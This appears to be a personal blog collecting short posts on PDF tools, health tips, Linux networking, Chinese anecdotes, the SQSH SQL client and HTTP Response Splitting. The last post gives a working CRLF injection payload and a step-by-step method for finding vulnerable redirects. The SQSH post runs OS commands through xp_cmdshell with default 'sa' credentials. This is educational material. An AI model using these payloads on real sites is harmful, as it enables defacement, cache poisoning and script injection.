Convert Files To PDF Online

If you don’t have access to the right desktop software, a few webapps will convert files to PDF and email you the result. Web site PDF Online lets you convert a bevy of document types to PDF online, sending the resulting PDF to your email address as an attachment.

Somewhat disappointingly, PDF Online doesn’t convert web pages by URL, but if you’re looking for something along those lines, check out previously-posted RSS 2 PDF. It is a free online service that lets you turn an RSS or OPML newsfeed into a PDF. It’s lightning fast and creates a very readable and nicely formated PDF for your offline reading pleasure.

Powered by ScribeFire.

Think While You Sleep

Your body may be resting, but your brain’s always at work.

Studies show that people given a mathematical problem before they went to bed had higher chances of solving it the next morning. Also, if you’re studying for a test or preparing for a presentation, review the material right before you turn off the lights.

“Since most memory consolidation happens during sleep, anything you read right before bed is more likely to be encoded as long-term memory,” says Men’s Health.

Powered by ScribeFire.

Different Function of Your L and R Ears

Your left ear and right ear have different specialties. “If you’re stuck chatting up a mumbler at a cocktail party, lean in with your right ear. It’s better than your left at following the rapid rhythms of speech, according to researchers at the UCLA David Geffen School of Medicine.

If, on the other hand, you’re trying to identify that song playing softly in the elevator, turn your left ear toward the sound. The left ear is better at picking up music tones.” (Source: Men’s Health)

Test your hearing superpowers on the mosquito tone, a high frequency that usually only young people can hear. See how the mosquito tone went down at Gawker HQ.

Powered by ScribeFire.

Scratch your leg to make it to the loo

Women trying to control the sudden and seemingly irrepressible urge to get to the bathroom need only to vigorously scratch the back of their leg.

Scratch the back of your leg. “If you scratch or rub the back of your calf for a few moments, really vigorously, you may interrupt the message from your bladder to your brain just long enough for you to make it to the toilet,” [continence expert Janetta] Webb said.”  (source: Sydney Morning Herald)

Thinking about sex can help you hold it for a little extra time, too.

Powered by ScribeFire.

Stop brain freeze with your tongue

If you sip on that frozen margarita too fast, you’ll have an ice cream headache in no time. Stop it with a simple tongue technique:

“Press your tongue flat against the roof of your mouth, covering as much as you can. “Since the nerves in the roof of your mouth get extremely cold, your body thinks your brain is freezing, too,” says [Ben Abo, an emergency medical- services specialist at the University of Pittsburgh.] “In compensating, it overheats, causing an ice-cream headache.” The more pressure you apply to the roof of your mouth, the faster your headache will subside.”

Powered by ScribeFire.

SQSH – MsSQL CLI Query Tool

SQSH (pronounced skwish) is short for SQshelL, a wonderful shell prompt for MsSQL due to the fact that it is Open Source, useful debugging tool and its interactive shell allows you to pipe the output of the SQL queries directly to other Unix commands for further processing. Essentially, it is a command-line interface tools for you to issue Transact-SQL commands to a ASE (Adaptive Server Enterprise) server and receiving and displaying results.

To get started, let’s go through some fundamental process which is installing SQSH. It is available at http://www.sqsh.org or SourceForge. We’re going to build it from source, although there are some binary packages available on the site. We are building version 2.1. Untar the package, cd sqsh-2.1. Then:

host@machine [501]$ export SYBASE=/usr/local/freetds
host@machine [502]$ ./configure
–snip–
host@machine [503]$ make
–snip–
host@machine [504]$ su
Password:
root@machine [505]# make install
–snip–
root@machine [506]# ls -l /usr/local/bin/sqsh
-rwxr-xr-x 1 root root 287 May 22 13:25 /usr/local/bin/sqsh
root@machine [507]# ls -l /usr/local/bin/sqsh.bin
-rwxr-xr-x 1 root root 651472 May 22 13:25 /usr/local/bin/sqsh.bin

Next, we are gonna to start using the tool by issuing some simple commands. For example, login to the SQL server by using this tool.

host@machine [501]$ sqsh -S {system name/IP}:{port num} -U {username} -P {password}

For eg,

host@machine [501]$ sqsh -S 10.0.0.10:1433 -U sa -P sa

This should allow you to login into the SQL server with your privilege. However it is recommended not to include the password in the command line because this grants any other user freedom to be able to discover your password using ps(1). We can supply the password in the other way:

host@machine [501]$ sqsh -S 10.0.0.10:1433 -U sa
sqsh-2.1 Copyright (C) 1995-2001 Scott C. Gray
This is free software with ABSOLUTELY NO WARRANTY
For more information type ‘\warranty’
Password:

–snip–

(7 rows affected)

1> xp_cmdshell ‘date’
2> go

        output
       ————————————————————————
———————————————————————————
———————————————————————————
———————
        The current date is: Fri 21/12/2007

        Enter the new date: (dd-mm-yy)

(2 rows affected)

(2 rows affected)

(2 rows affected)

Powered by ScribeFire.

Configuring TCP/IP Statically in Linux

It has never been too painful for me to setup my IP address and default gateway blah blah blah in my Windows world, however it is not the same case when comes to Linux. Nevertheless, it is relatively easy as well.

Each Linux distro stores their network configuration file in a different location. For instance, Debian keeps the config file that contains the IP information in /etc/network/interfaces. By making changes to the file, we can actually statically changing the TCP/IP information for the workstation. The changes is permanent, that carries the meaning that the changes stay even you reboot your system.

The next method which just give a temporary effect is Command-line Configuration. There are just 2 commands needed in order to make things work:

host:~# ifconfig eth0 {ip add} netmask {subnet mask}
host:~# route add default gw {gateway add}

The first command tells the system to configure Ethernet adapter 0 on your NIC to have {ip add} as the IP address with {subnet mask} as the netmask. The second command configures the gateway of the system. However, it should be noted that the configuration will lose once the device is turned off or reboot.

Lastly, to check whether or not the TCP/IP changes have been made on the NIC, there are 2 commands could be used, depending on your choice:

route

or

netstat -nr

By issuing one of the commands, you can verify whether the changes have take effect with looking at the routing table.

ps: Note that you will need super user privilege in order to perform the configuration. “sudo bash” could be used in some case.

Powered by ScribeFire.

丈夫何以叫”老公”,妻子何以稱”老婆”?

據說源於唐代的一段故事。

唐代有一個名士，名叫麥愛新，他看到自己的妻子年老色衰，便產生了嫌棄老妻，再納新歡的想法，並寫了一副上聯放在案頭：

「荷敗蓮殘，落葉歸根成老藕。」

被他的妻子看到了，妻子從對聯中看到了丈夫棄老納新的念頭，於是便提筆續了一副下聯：

「禾黃稻熟，吹糠見米現新糧。」

以「禾稻」對「荷蓮」，以「新糧」對「老藕」，不僅對得十分工整貼切，新穎通俗，而且，「新糧」與「新娘」諧音，饒有風趣。
麥愛新讀了妻子的下聯，被妻子的才思敏捷和拳拳愛心所打動，便放棄了棄舊納新的念頭。
妻子見丈夫回心轉意，不忘舊情，乃揮筆寫道：

「老公十分公道。」

麥愛新也揮筆寫了下聯：

「老婆一片婆心。」

這個帶有教育意義的故事很快被流傳開來，世代傳為佳話。

Powered by ScribeFire.

公廁裡的烘乾機不要用

公共場所裡的廁所，通常都有烘乾機的設備，洗過手後烘一下，雙手就乾爽了，用起來非常方便，使用的頻率也很高。

但最近的醫學研究指出，廁所裡的烘乾機，長期放置在溫暖潮濕的空氣中，又缺乏消毒，早已成為細菌的溫床，洗淨的手經由烘乾機吹乾的同時，正好把細菌散布在雙手上，如果用手接觸口鼻，就會把細菌帶入人體內，所以到公共場所上廁所時，洗手後用紙擦乾就行，不要再使用烘乾機了。

Powered by ScribeFire.

HTTP Response Splitting Attack

Recently I have came across with a new method of attacking web application which is called HTTP Response Splitting, aka CRLF Injection. (Well, it might not be a really new kind of attacking vector, still it is considered new to me) This kind of vulnerability is generally carried out in web applications by injecting malicious or unexpected characters in user input which is then used for a 302 Redirect, in the Location or Set-Cookie header. Failure of the application to properly sanitizing the input would cause further damages such as Cross Site Scripting (XSS), Cross User Defacement (this is a form of temporary defacement), Web Cache Poisoning, Browser Cache Poisoning, and so on.

A good web application should be smart enough to reject illegal user input specifically like CR (Carriage Return, also given by %0d or \r) and LF (Line Feed, also given by %0a or \n) characters. These characters not only give attackers control of the remaining headers and body of the response the application intends to send, but also allows them to create additional responses entirely under their control.

Now talking about CR and LF. HTTP/1.1 defines the sequence CR LF as the end-of-line marker for all protocol elements except the entity-body. That is as per HTTP standard, headers are separated by on CRLF and the response’s headers are separated from its body by two. Therefore, the failure to remove CRs and LFs allows the attacker to set arbitrary headers, take control of the body, or break the response into two or more separate responses (hence the name).

Now let’s move on to demonstrate how to launch an HTTP Response Splitting attack. Normally we will make use of those webpages that allows URL redirection, for instance Language redirection. Think you should ever come across with those sites that asking you to make language selection before you proceed to the further inner webpages. That’s our babes! Instead of choosing languages such as English, we send a value, which makes use of URL-encoded CRLF sequences to terminate the current response, and shape an additional one:

/redir_lang.php?lang=foobar%0d%0aContent-Length:%200%0d%0a
%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html
%0d%0aContent-Length:%2019%0d%0a
%0d%0a%3Chtml%3EHacked%3C/html%3E (all in one line)

This results following headers being sent to the web server:

HTTP/1.1 302 Moved Temporarily
Date: Mon, 10 Dec 2007 20:00:20 GMT
Location: http://victim/redir_lang.php?lang=foobar
Content-Length: 0

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 19

<html>Hacked</html>

The target would believe that the first request is matched to the first response:

HTTP/1.1 302 Moved Temporarily
Date: Mon, 10 Dec 2007 20:00:20 GMT
Location: http://victim/redir_lang.php?lang=foobar
Content-Length: 0

And the second request (to /anything.html) is matched to the second response:

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 19

<html>Hacked</html>

Okay, for the conclusion, to make life easier, here’s my silly yet KISS methodology:

For redirection response splitting:

1. Locate a redirect on the site. You can find them by manual inspection.
2. See what kind of redirect it is by slowing it down with burp proxy with all server responses turned on (turn off the text bullet).
3. If it’s a META it’s not vulnerable (may be to XSS but not to response splitting). Same with JavaScript redirection. If it’s 301, 302 or 304, chances are it’s vulnerable.
4. Next replace the “http://victim….” with “%0d%0a[www.whatever]….” and hit the redirection again. If you see that it’s changed the output from the %0d%0a to an actual CR/LF there is a very high probability that it’s vulnerable.
5. Lastly try a full header injection with something like %0d%0aContent-Type:%20text/html%0d%0a…
   

Powered by ScribeFire.